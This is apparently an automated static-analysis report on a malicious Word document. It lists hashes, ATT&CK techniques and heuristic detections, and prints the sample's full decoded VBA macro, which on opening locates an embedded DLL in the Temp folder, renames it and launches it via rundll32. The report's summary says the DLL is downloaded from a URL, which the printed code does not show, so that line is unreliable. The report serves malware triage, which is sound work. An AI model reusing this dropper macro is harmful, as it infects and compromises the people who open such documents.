Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c27c5fad625f35ee…

MALICIOUS

Office (OLE)

986.5 KB Created: 2021-06-24 12:00:00 Authoring application: Microsoft Office Word First seen: 2021-07-02
MD5: 0deee4fd1efd99ea68efac3f235a418d SHA-1: a7d729c92b9a197f8ac1aec329f78965352c6fa3 SHA-256: c27c5fad625f35ee7e02f6464cabc30745308eb4d50eb3136e0ae9ca23efb56c
570 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer T1027 Obfuscated Files or Information T1566.001 Spearphishing Attachment

The sample contains VBA macros that execute upon opening, specifically the Document_Open macro. This macro attempts to download and execute a DLL file named 'kikus.dll' from a URL constructed from concatenated strings. The presence of an embedded PE executable and OLE package further indicates malicious intent, likely to deliver a secondary payload.

Heuristics 15

  • Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • ClamAV: Win.Packed.Johnnie-10034316-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Packed.Johnnie-10034316-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    x86 disassembly · validity: code (0.969) — 11/11 branch targets land on an instruction boundary (100% coherence)
    000BC2ED  64a130000000      mov eax, dword ptr fs:[0x30]
000BC2F3  8b4068            mov eax, dword ptr [eax + 0x68]
000BC2F6  c1e808            shr eax, 8
000BC2F9  a801              test al, 1
000BC2FB  7510              jne 0xbc30d
000BC2FD  ff7508            push dword ptr [ebp + 8]
000BC300  ff1504110401      call dword ptr [0x1041104]
000BC306  50                push eax
000BC307  ff1508110401      call dword ptr [0x1041108]
000BC30D  ff7508            push dword ptr [ebp + 8]
000BC310  e84e000000        call 0xbc363
000BC315  59                pop ecx
000BC316  ff7508            push dword ptr [ebp + 8]
000BC319  ff1540110401      call dword ptr [0x1041140]
000BC31F  cc                int3
000BC320  6a00              push 0
000BC322  ff15d0100401      call dword ptr [0x10410d0]
000BC328  85c0              test eax, eax
000BC32A  7434              je 0xbc360
000BC32C  b94d5a0000        mov ecx, 0x5a4d
000BC331  663908            cmp word ptr [eax], cx
000BC334  752a              jne 0xbc360
000BC336  8b483c            mov ecx, dword ptr [eax + 0x3c]
000BC339  03c8              add ecx, eax
000BC33B  813950450000      cmp dword ptr [ecx], 0x4550
000BC341  751d              jne 0xbc360
000BC343  b80b010000        mov eax, 0x10b
000BC348  66394118          cmp word ptr [ecx + 0x18], ax
000BC34C  75                .byte 0x75
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Ole10Native package carries executable/script file type high OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in an executable or script-capable extension. Even without UI extension spoofing, embedding a runnable payload inside an Office document is a high-risk delivery pattern.
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
       Set vbvcx = CreateObject("Scripting.FileSystemObject")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT
    Reference to VirtualProtect API
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2742 bytes
SHA-256: ad427da8430d0bab4b976c0aa215ff17485db4f0e31aee29dd87b9d86837c45d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Option Compare Text
  Private Declare PtrSafe Function gc Lib "shell32" _
        Alias "ShellExecuteA" (ByVal hwnd As Long, _
        ByVal lpOperation As String, ByVal lpFile As String, _
        ByVal lpParameters As String, ByVal lpDirectory As String, _
        ByVal nShowCmd As Long) As Long
        Dim hdv As String
Private Sub Document_Open()
Dim vcbc As String
Dim bbbb As String
Dim cx
cx = wdUserTemplatesPath
bbbb = "ru"
vcbc = Options.DefaultFilePath(cx)
bbbb = bbbb & "n" & "dl"
If Dir(vcbc & "\kikus.dll") = "" Then
Call yyy

If Len(hdv) > 2 Then

Call nam(hdv)




 Dim cvzz As String
cvzz = "l3" & "2"


  gc 0, vbNullString, _
    bbbb & cvzz, vcbc & "\kikus.dll,LCQHBFEYHXH", _
     vbNullString, 1
End If
End If
End Sub



Sub hdhdd(asda As String)


 Dim vbvcx As Object
   Set vbvcx = CreateObject("Scripting.FileSystemObject")
Call Search(vbvcx.GetFolder(asda), hdv)

End Sub

Sub yyy()
  Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.TypeBackspace
    Selection.Copy
    Call bvxfcsd
End Sub






Attribute VB_Name = "Module1"
Dim pls As String


Sub nam(pafs As String)
Call ousx
Dim oxl
oxl = ".dll"
Name pafs As pls & "\" & "kikus" & oxl
End Sub


Sub uoia(fffs As String)
pls = fffs
End Sub
 
 Sub Search(mds As Object, pafs As String)
 Dim Nedc As Object

  
   For Each Nedc In mds.SubFolders
     Search Nedc, pafs
   Next Nedc
Dim Ters As Object
   For Each Ters In mds.Files
   
   If Ters.Name = "kiks.dll" Then
       
        pafs = Ters
        End If
   Next Ters
   Exit Sub
ErrHandle:
   
   Err.Clear
End Sub





Attribute VB_Name = "Module2"

Sub ousx()
Call uoia(Options.DefaultFilePath(wdUserTemplatesPath))
End Sub


Attribute VB_Name = "Module3"
Sub bvxfcsd()

Dim dfbvc As String
dfbvc = "al" & "\Te"

Dim ewrwsdf As String
ewrwsdf = "L" & "o" & "c" & dfbvc & "mp"



    ntgs = 50
sda = 49


While sda < 50
      ntgs = ntgs - 1

      If Dir(Left(Options.DefaultFilePath(wdUserTemplatesPath), ntgs) & ewrwsdf, vbDirectory) = "" Then
        
    Else
  
   sda = 61
    End If

   Wend
   Call ThisDocument.hdhdd(Left(Options.DefaultFilePath(wdUserTemplatesPath), ntgs) & ewrwsdf)
End Sub
embedded_office_0008ee71.exe embedded-pe Office MZ+PE at offset 0x8EE71 424847 bytes
SHA-256: 9687368aa7bb849f423e939a5ffb415c0f9592495cfe988ca0256f902bdc112b
Detection
ClamAV: Win.Packed.Midie-10008727-0
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_VIRTUALPROTECT, SC_STR_GETPROCADDRESS Static shellcode analysis recovered API/import strings: VirtualProtect, GetProcAddress, ExitProcess, ShellExecuteA Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1686015991/Ole10Native 384309 bytes
SHA-256: 4c91f75e7c646f02a4e81780f886c821e4e2f07e1e8a72c19ca473cdc5e34b4c
Detection
ClamAV: Win.Packed.Johnnie-10034316-0
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_VIRTUALPROTECT, SC_STR_GETPROCADDRESS Static shellcode analysis recovered API/import strings: VirtualProtect, GetProcAddress, ExitProcess
ole10native_00_kiks.dll ole-package-payload OLE Ole10Native payload: ObjectPool/_1686015991/Ole10Native; display_name=kiks.dll; full_path=C:\Users\MyPc\AppData\Local\Temp\kiks.dll; temp_path=; def_file= 384000 bytes
SHA-256: b8f9cac9fd6145a6c0dcf5dfc3b37d63210d46f24aae5e21cfcfe3ee84766d3f
Detection
ClamAV: Win.Packed.Johnnie-10034316-0
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_VIRTUALPROTECT, SC_STR_GETPROCADDRESS Static shellcode analysis recovered API/import strings: VirtualProtect, GetProcAddress, ExitProcess

Open this report in the interactive analyzer, or submit your own file for analysis.